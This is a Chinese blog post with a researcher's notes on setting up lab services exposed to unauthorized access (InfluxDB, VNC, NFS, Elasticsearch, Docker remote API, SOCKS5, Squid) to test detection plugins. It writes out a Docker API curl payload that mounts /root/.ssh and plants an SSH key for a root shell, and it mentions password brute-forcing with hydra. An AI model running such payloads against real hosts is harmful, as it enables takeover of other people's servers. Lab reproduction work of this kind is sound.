未授权访问服务搭建

最新推荐文章于 2024-08-13 00:00:00 发布
最新推荐文章于 2024-08-13 00:00:00 发布
阅读量1.9k 收藏
点赞数
分类专栏: Web python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/105488227
版权
Web 同时被 2 个专栏收录
220 篇文章 7 订阅
订阅专栏
python
24 篇文章 0 订阅
订阅专栏

influxdb安装

参考:
https://v2.docs.influxdata.com/v2.0/get-started/
https://portal.influxdata.com/downloads/
https://www.anquanke.com/post/id/179674

wget https://dl.influxdata.com/influxdb/releases/influxdb_2.0.0-beta.8_linux_amd64.tar.gz
tar zxf influxdb_2.0.0-beta.8_linux_amd64.tar.gz
# 将两个可执行文件复制到bin目录下待执行
sudo cp influxdb_2.0.0-beta.8_linux_amd64/{influx,influxd} /usr/local/bin/
# 启动influxdb
influxd

在这里插入图片描述

或者1.x版本环境搭建:

sudo apt-get install influxdb

在这里插入图片描述

安装指定版本1.7.5:

wget https://dl.influxdata.com/influxdb/releases/influxdb-1.7.5-static_linux_amd64.tar.gz
tar zxf influxdb-1.7.5-static_linux_amd64.tar.gz
cd influxdb-1.7.5-1/
./influxd

启动之后,
参考以下利用步骤:
在这里插入图片描述

直接访问这个接口:
在这里插入图片描述
利用这个工具:
https://jwt.io/

InfluxDB supports both password and “JWT” based authentication.

参考:https://www.komodosec.com/post/when-all-else-fails-find-a-0-day

InfluxDB支持密码,以及JWT的认证。

软件设计的“默认安全”概念:
不需要用户进行配置的情况下,默认情况下应该是安全的。

poc验证成功:
在这里插入图片描述

在ubuntu server上安装VNC服务器

参考:
https://blog.whe.me/post/ubuntu-install-gui.html

sudo apt install --no-install-recommends ubuntu-desktop gnome-panel gnome-settings-daemon metacity nautilus gnome-terminal -y

sudo apt install vnc4server -y

然后开启:
在这里插入图片描述

Windows VNC客户端

下载:
https://www.realvnc.com/download/file/viewer.files/VNC-Viewer-6.20.113-Windows.exe
在这里插入图片描述
使用nmap扫描vnc服务,
在这里插入图片描述

编写pocsuite插件(仅探测VNC服务):
在这里插入图片描述
停止VNC

vncserver -kill :1

在这里插入图片描述
输入一下命令

cd ~/.vnc/
rm -rf passwd

输入 vncserver

重新设置密码

pocsuite:(爆破VNC密码)
在这里插入图片描述

NFS服务安装

参考:
https://www.digitalocean.com/community/tutorials/how-to-set-up-an-nfs-mount-on-ubuntu-18-04
https://vitux.com/install-nfs-server-and-client-on-ubuntu/
https://www.linuxidc.com/Linux/2018-11/155331.htm

NFS服务端安装:

sudo apt install nfs-kernel-server

NFS客户端安装:

sudo apt install nfs-common

修改:


sudo vi /etc/exports
# /home/77/repos/sharedfolder 192.168.85.0/24(rw,sync,no_root_squash,no_subtree_check)

参数的解释:

rw: read and write operations
sync: write any change to the disc before applying it
no_subtree_check: prevent subtree checking

将共享目录导出:

sudo exportfs -a

然后重启NFS服务:

sudo systemctl restart nfs-kernel-server

在这里插入图片描述
注意挂载到本地之后还要记得清理掉:

    # 删除目录
    def clean_dir(self, p_dir):
        logger.info('umount {0}  && rm -rf {0}'.format(p_dir))
        r = os.system('umount {0}  && rm -rf {0}'.format(p_dir))    # 卸载目录 删除目录
        return r

在这里插入图片描述

抓包分析
尝试showmount 命令

用另外一台设备(192.168.85.130)使用这个命令

showmount -e 192.168.85.129

然后在192.168.85.129(NFS服务器)上抓包:

sudo tcpdump -i ens33 -w nfs.pcap

先是一段基于UDP的Portmap协议数据:
在这里插入图片描述
然后实际访问的是远程的35807端口。
在这里插入图片描述

选择yaml格式:
在这里插入图片描述
可以得到数据包的base64格式。

echo "gAAASL/SK3gAAAAAAAAAAgABhqUAAAADAAAABQAAAAEAAAAgXpWASwAAAAZ1YnVudHUAAAAAA+wAAAPsAAAAAQAAA+wAAAAAAAAAAA=="|base64 -d|nc -v 192.168.85.129 35807

在这里插入图片描述

使用mount命令

由于不知道这个端口是否确定,所以放弃使用showmount命令,转而使用mount命令。

sudo mount -t nfs 192.168.85.129:/home/77/repos/sharedfolder /tmp/share

将远程192.168.85.129的/home/77/repos/sharedfolder目录挂载到本地的/tmp/share目录。

参考:
https://www.jianshu.com/p/40fbd63cf982
在这里插入图片描述

编写pocsuite插件:
在这里插入图片描述
之前仅通过nfs端口的服务banner判断是否存在漏洞是有问题的。
判断依据:

showmount -e <host>

若只有一行,说明没有export目录;
若有两行,则第二行为export的目录;

但是即便有export,也不一定就存在漏洞。
还要看共享的范围:
在这里插入图片描述
比如这个仅共享给了它同一个C段,其他网段的人虽然能看到这个信息,但是无法mount到本地。
在这里插入图片描述

仅当这个网络范围恰好为执行这个mount命令的主机所在范围时,才能成功:
在这里插入图片描述
在这里插入图片描述

详情参考:
在这里插入图片描述
字节hex转换参考:
https://blog.csdn.net/wowocpp/article/details/79701739
https://www.cnblogs.com/LoveMusicGuy/p/10616430.html

Elasticsearch未授权访问

参考:
https://xz.aliyun.com/t/6103#toc-11
https://www.cnblogs.com/xiaozi/p/8275201.html

wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-5.5.0.zip
unzip elasticsearch-5.5.0.zip 
cd elasticsearch-5.5.0/bin
./elasticsearch

在这里插入图片描述
可以看到es默认情况是监听在本地的,
可以修改config/elasticsearch.yml文件,
在这里插入图片描述
然后重新启动:
这样就局域网可访问了:
在这里插入图片描述
poc检测两个特征,加强可靠性:
1,GET访问根路径,返回es的slogan:You Know, for Search
2,GET访问/_cat,响应里有/_cat/master

在这里插入图片描述
pocsuite:
在这里插入图片描述

使用

umount /tmp/share

可以卸载目录。

Docker remote api未授权访问

参考:

  • https://blog.csdn.net/yuanlaijike/article/details/80913096
  • https://p0sec.net/index.php/archives/115/
    在这里插入图片描述

docker默认安装启动情况下是不会开启这个2375端口的。
第一种,修改service文件:/lib/systemd/system/docker.service
将被注释的注释掉,添加上面那一行

ExecStart=/usr/bin/dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375
#ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock

(PS: 方便下载国内的源,可以加上--registry-mirror=https://docker.mirrors.ustc.edu.cn)
参考:
https://www.jianshu.com/p/df75f9b5fcf6
然后重新启动:

sudo systemctl daemon-reload
sudo service docker restart

然后就可以通过http访问docker的api了:
在这里插入图片描述
第二种,修改/var/lib/docker

由于根目录下没有那么大空间,
修改默认的/var/lib/docker,
将其移动到家目录,然后使用软连接指向/var/lib/docker
参考:
https://blog.csdn.net/wenwenxiong/article/details/78728696

由于没有images,即便可未授权访问,也没法开启container

77@ubuntu130:~$ curl  -X POST  -H "Content-Type: application/json"  -d '{ "Cmd": [ "/bin/sh", "-c", " echo \"公钥\" >> /tmp/authorized_keys " ], "Image": "sshd", "Volumes": { "/tmp": {} }, "HostConfig": { "Binds": ["/root/.ssh:/tmp:rw"] } } ' "http://192.168.85.129:2375/containers/create"
{"message":"No such image: sshd:latest"}

利用方式参考:
https://jkme.github.io/docker-remote-exploit.html

于是先拉一个image下来:

docker pull ubuntu:18.04

拉了images之后,再访问api就会有image了。
在这里插入图片描述

使用可用的image之后发现成功创建了container:
在这里插入图片描述

发现创建container的时候,命令并不会被执行:
在这里插入图片描述

需要再执行一步start命令:
POST /containers/<containerID>/start
在这里插入图片描述

成功start之后,写入了文件,
在这里插入图片描述

然后可以访问受害者的root shell了:
在这里插入图片描述

socks5未授权

当ss设置了用户密码之后,
在这里插入图片描述

不带密码访问

python3.6 -m pip install ss--proxy=192.168.85.1:1080

在这里插入图片描述
其实就是直接向代理服务器发起这个请求:

CONNECT pypi.python.org:443 HTTP/1.0

带密码访问:

python3.6 -m pip install --proxy http://cqq:cqq@192.168.85.1:1080 XXX

在这里插入图片描述

当带着正确密码访问时 :

CONNECT pypi.python.org:443 HTTP/1.0
Proxy-Authorization: Basic Y3FxOnBhc3M=

在这里插入图片描述
响应200,然后后续的流量被加密了。

 ssserver -p 1080 -k pass -m aes-256-cfb

启动报错问题参考:
https://floperry.github.io/2019/02/24/2018-06-25-Ubuntu-18.04-%E4%B8%8B%E8%A7%A3%E5%86%B3-shadowsocks-%E6%9C%8D%E5%8A%A1%E6%8A%A5%E9%94%99%E9%97%AE%E9%A2%98/

使用hydra破解成功的流量:
在这里插入图片描述

在这里插入图片描述

注意向本地127.0.0.1发起请求时,默认不需要认证的,所以不管什么密码都会返回\x01\x00即成功。

在这里插入图片描述

参考:
https://www.jianshu.com/p/d03310004668
https://www.cnblogs.com/litaozijin/p/6506354.html
http://zhihan.me/network/2017/09/24/socks5-protocol/

http未授权

使用squid搭建http代理。配置账号密码admin:admin
参考:
https://katyusha.net/557.html
https://blog.csdn.net/sukeeeeeeeee/article/details/62893242
直接不使用凭据访问:

curl --proxy 192.168.85.129:3128 http://ip.cn

在这里插入图片描述
带有认证的方式:

curl --proxy 192.168.85.129:3128 --proxy-user admin:admin http://baidu.com

在这里插入图片描述

pocsuite

在这里插入图片描述

/etc/squid/squid.conf文件:

auth_param basic program /usr/lib/squid/basic_ncsa_auth /etc/squid/passwd
acl auth_user proxy_auth REQUIRED
http_access allow auth_user

设置密码
sudo htpasswd -c /etc/squid/passwd cqq

重启
sudo systemctl restart squid

如果配置了认证,依然可以未经认证登录,则可能是配置了localnet允许登录,例如:

acl localnet src 192.168.85.0/24
http_access allow localnet
caiqiiqi
关注
专栏目录
Spring Boot OAuth2 认证服务搭建授权码认证演示
oscar999的专栏
07-26 973
本篇基于JDK8 搭建Spring Boot 的OAuth 2的认证服务器, 并完全显示授权码认证模式的完整过程
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC 授权访问漏洞复现
qq_51577576的博客
09-03 1547
[ vulhub漏洞复现篇 ] Hadoop-yarn-RPC授权访问漏洞复现 Hadoop是一个由Apache基金会所开发的分布式系统基础架构,由于服务器直接在开放了 Hadoop 机器 HDFS 的 50070 web 端口及部分默认服务端口,黑客可以通过命令行操作多个目录下的数据,如进行删除,下载,目录浏览甚至命令执行等操作,产生极大的危害。...
redis授权访问
ce666666的博客
02-04 1838
前言 不经历风雨,怎能看到彩虹 了解 redis是一个开源的、使用C语言编写的、支持网络交互的、可基于内存也可持久化的Key-Value数据库。 以MemcacheDB、Tokyo Tyrant为代表的key-value分布式存储,在上万并发连接下,轻松地完成高速查询。而MySQL,在几百个并发连接下,就基本上崩溃了。 安装 > wget http://download.redis.io/releases/redis-6.0.8.tar.gz tar xzf redis-6.0.8.tar.gz
数据库安全:InfluxDB 授权访问-Jwt验证不当 漏洞.
网络安全领域___专研者.
11-11 1402
InfluxDB 是一个开源分布式时序,时间和指标数据库。其数据库是使用​​​​​​​Jwt 作为鉴权方式,在用户开启认证时,如果在设置参数shared-secret的情况下,Jwt 认证密钥为空字符串,这样攻击者就能伪造任意用户身份在 InfluxDB 数据库中执行SQL语句,因此会导致敏感信息泄露和执行威胁到数据库的数据命令.
5大数据库授权访问漏洞深度剖析【黑客最爱的‘甜点‘】
最新发布
2301_80064376的博客
08-13 1120
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。靶场Hadoop YARN ResourceManager 授权访问漏洞是一个严重的安全隐患,它潜伏在许多经正确配置的 Hadoop 集群中。这个漏洞的核心问题在于 YARN 的 ResourceManager 组件在默认情况下可能没有启用适当的访问控制机制。
CVE-2019-20933-influxdb授权访问-vulhub
c0529的博客
06-12 630
InfluxDB 是一个开源分布式时序、时间和指标数据库,使用 Go 语言编写,无需外部依赖。其设计目标是实现分布式和水平伸缩扩展,是 InfluxData 的核心产品。其使用 jwt 作为鉴权方式。在用户开启了认证,但设置参数 shared-secret 的情况下,jwt 的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在 InfluxDB 中执行SQL语句。
授权访问:VNC授权访问
qq_68163788的博客
05-13 975
VNC(Virtual Network Computing)是一种流行的远程控制计算机系统的协议。它允许用户通过网络从一台计算机查看和操作另一台计算机的桌面环境,就像坐在那台计算机前一样。然而,如果VNC服务器没有正确配置安全措施,比如设置访问密码或仅允许特定IP地址连接,就可能导致授权访问的风险。 授权访问意味着恶意攻击者可能会无需密码或通过猜测弱密码等手段,非法获取对VNC服务器的控制权限。一旦攻击者获得了访问权限,他们可以监控敏感信息、安装恶意软件、篡改数据甚至完全接管受害者的计算机系统。
Rsync授权访问
浅笑996的博客
11-19 5233
1.漏洞名称 Rsync 授权访问漏洞 2.漏洞原理 rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。 其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或 访问密码,我们将可以读写目标服务器文件。 3.漏洞利用 vulhub环境靶机 : 192.168.91.130 攻击机:kali 192.168.91.128...
麒麟V10服务搭建FTP服务
12-14
麒麟V10服务搭建FTP服务 FTP(File Transfer Protocol)是一种常用的文件传输协议,麒麟V10服务搭建FTP服务可以帮助用户快速搭建FTP服务器,实现文件的上传、下载和共享。本文将指导用户如何在麒麟V10服务器上...
Jenkins授权访问
weixin_43622525的博客
03-04 2798
Jenkins Jenkins简介 Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,它能把软件开发过程形成工作流。默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。 Jenkins授权访问 部署Jenkins 1.62版本,将全局授权策略打开,目前新版本的Jenkins已默认需要用户登录,但老版的中默认配置是“任意用...
redis_授权访问
scu_hacker博客
01-13 8232
本文介绍redis授权访问的4种利用方式
授权访问
cheapkiller的博客
08-05 1906
授权访问可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷,导致其他用户可以直接访问,从而引发重要权限可被操作、数据库、网站目录等敏感信息泄露。日录遍历目前主要存在授权访问漏洞的有:NFS 服务,Samba服务,LDAP,Rsync,FTPGitLab,Jenkins,MongoDB, Redis, ZooKeeper, ElasticSearch, Memcache,CouchDB,Docker,Solr,Hadoop,Dubbo 等...
influxdb授权访问漏洞
EC_Carrot的博客
07-02 2353
漏洞背景 influxdb是一款著名的时序数据库,其使用jwt作为鉴权方式。在用户开启了认证,但设置参数shared-secret的情况下,jwt的认证密钥为空字符串,此时攻击者可以伪造任意用户身份在influxdb中执行SQL语句。 漏洞复现 首先我们需要借助https://jwt.io/来生成jwt token 其中,admin是一个已经存在的用户,exp是一个时间戳,代表着这个token的过期时间,你需要设置为一个来的时间戳。 (还好这个网站鼠标指上去能显示时间戳的时间,不然都不知道怎么整) 将
InfluxDB 授权访问漏洞复现
weixin_52125240的博客
03-16 9996
InfluxDB 授权访问漏洞复现 前言:第一次复现漏洞,肯定会有很多不足的地方,这也是
(五)解决InfluxDB 授权访问
weixin_48226988的博客
12-31 6430
InfluxDB是一个由InfluxData开发的开源时序型数据库。它由Go写成,着力于高性能地查询与存储时序型数据。InfluxDB被广泛应用于存储系统的监控数据,IoT行业的实时数据等场景。 默认情况下InfluxDB没有开启认证措施,攻击者可以通过授权访问,构造相应的API请求,直接操作InfluxDB中的数据,可能导致敏感数据丢失或者泄漏。 开启InfluxDB 授权访问访问还是很简单的,操作步骤如下。 1、没有设置auth时,直接就显示了数据库内容 ~:influx > show data
授权访问漏洞
C233333235的博客
08-04 998
Redis 默认情况下,会绑定在,如果没有进⾏采⽤相关的策略,⽐如添加防 ⽕墙规则避免其他⾮信任来源 ip 访问等,这样将会将 Redis 服务暴露到公⽹上,如果在没有设 置密码认证(⼀般为空)的情况下,会导致任意⽤户在可以访问⽬标服务器的情况下授权Redis 以及读取 Redis 的数据。攻击者在授权访问 Redis 的情况下,利⽤ Redis ⾃身的提供的config 命令,可以进⾏写⽂件操作,攻击者可以成功将⾃⼰的ssh公钥写⼊⽬标服务器的/root/.ssh ⽂件夹的。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值